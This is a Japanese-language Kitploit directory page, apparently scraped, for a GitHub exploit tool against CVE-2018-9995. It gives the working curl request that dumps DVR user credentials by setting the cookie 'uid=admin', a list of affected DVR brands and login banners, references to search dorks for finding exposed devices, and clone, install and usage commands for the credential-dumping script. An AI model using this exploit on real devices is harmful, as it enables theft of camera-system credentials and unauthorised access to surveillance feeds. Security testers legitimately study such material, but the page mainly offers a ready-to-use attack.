Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-9995_dvr_credentials — CVE-2018-9995のエクスプロイトツールで、細工したHTTPリクエストを介してDVRの認証情報を取得し、セキュリティテスト用に複数のDVRベンダーを対象とします。 | Kitploit
ツール/GitHubGitHub/batmoshka55/cve-2018-9995_dvr_credentials
IoTセキュリティパスワード攻撃脆弱性分析エクスプロイト情報収集ウェブセキュリティ
GitHubbatmoshka55/cve-2018-9995_dvr_credentials

CVE-2018-9995_dvr_credentials

CVE-2018-9995のエクスプロイトツールで、細工したHTTPリクエストを介してDVRの認証情報を取得し、セキュリティテスト用に複数のDVRベンダーを対象とします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
31年前未レビュー

[ツール] DVR認証情報を表示

root@kitploit:~
[*] エクスプロイトタイトル:       "DVR認証情報の取得と変更"
[*] CVE:                 CVE-2018-9995
[*] CVSS基本スコアv3:  7.3 / 10
[*] CVSSベクトル文字列:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] 日付:                09/04/2018 修正 28/04/2024
[*] エクスプロイト作者:      Fernandez Ezequiel ( twitter:@capitan_alfa ) & batmoshka55

DVR_wall

エクスプロイト:

root@kitploit:~
	$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

DVRでテスト済み (バナー/ベンダー?):

root@kitploit:~
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (タイトル: "XVR Login")
Securus,  - セキュリティ。決して妥協しません!! - 
Night OWL
DVR Login
HVR Login
MDVR Login

実際の環境で:

DVR_dorks_0 DVR_dorks_2 DVR_dorks_1 DVR_dorks_3

考えられるフロントエンドバナー (Web):

DVR_login_1 DVR_login_2 DVR_login_3 DVR_login_4 DVR_login_5 DVR_login_6 DVR_login_7 DVR_login_8 DVR_login_10

屋内:

DVR_indoor_1 DVR_indoor_2 DVR_indoor_3 DVR_indoor_4 DVR_indoor_5 DVR_indoor_6 DVR_indoor_7

ツール: "すべてのDVR認証情報を表示"

クイックスタート

root@kitploit:~
usr@pwn:~$ git clone https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt

ヘルプ

root@kitploit:~
使用法: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] 露出した認証情報を取得中

オプション引数:
  -h, --help     このヘルプメッセージを表示して終了
  -v, --version  プログラムのバージョン番号を表示して終了
  --host HOST    ホスト
  --port PORT    ポート

[+] デモ: python getDVR_Credentials.py --host 192.168.1.101 -p 81

PoC (出力):

DVR_poc_4 DVR_poc_3 DVR_poc_2 DVR_poc_1

ブログ:

見えたぞ...! xd

ツールをダウンロード